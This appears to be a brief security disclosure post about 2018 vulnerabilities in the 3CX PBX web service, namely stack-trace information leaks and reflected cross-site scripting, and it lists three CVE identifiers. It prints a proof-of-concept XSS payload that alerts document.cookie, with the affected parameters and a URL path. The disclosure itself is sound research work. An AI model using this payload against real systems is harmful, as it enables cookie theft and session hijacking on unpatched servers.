Security Issues on 3cx Web Service
some CVEs found by me and my bros 2018 when i was a Jr
Last updated
some CVEs found by me and my bros 2018 when i was a Jr
Last updated
Me and my coworkers, Ricardo Fajin, Daniel Chactoura, Lucas Carmo, Kelvin Clark, Found some issues on the famous pabx 3cx .
Multiple Improper error Handling
Cross Site Scripting Reflected
Cross Site Scripting on Stack trace
Researching the application we found several traceback errors. As an explample the error below. this could be especially dangerous because it gives, several informations about the server itself.
Payload used: <img src=`%00`
 onerror=alert(document.cookie)

Parameter: TimeZoneName
URL: https://<ip>:5001/#/app/ivr_editor/4
Payload Used: <img src=`%00`
 onerror=alert(document.cookie)

Parameter: propertyPath
CVEs Related to this article:
CVE-2018–14905
CVE-2018–14906
CVE-2018–14907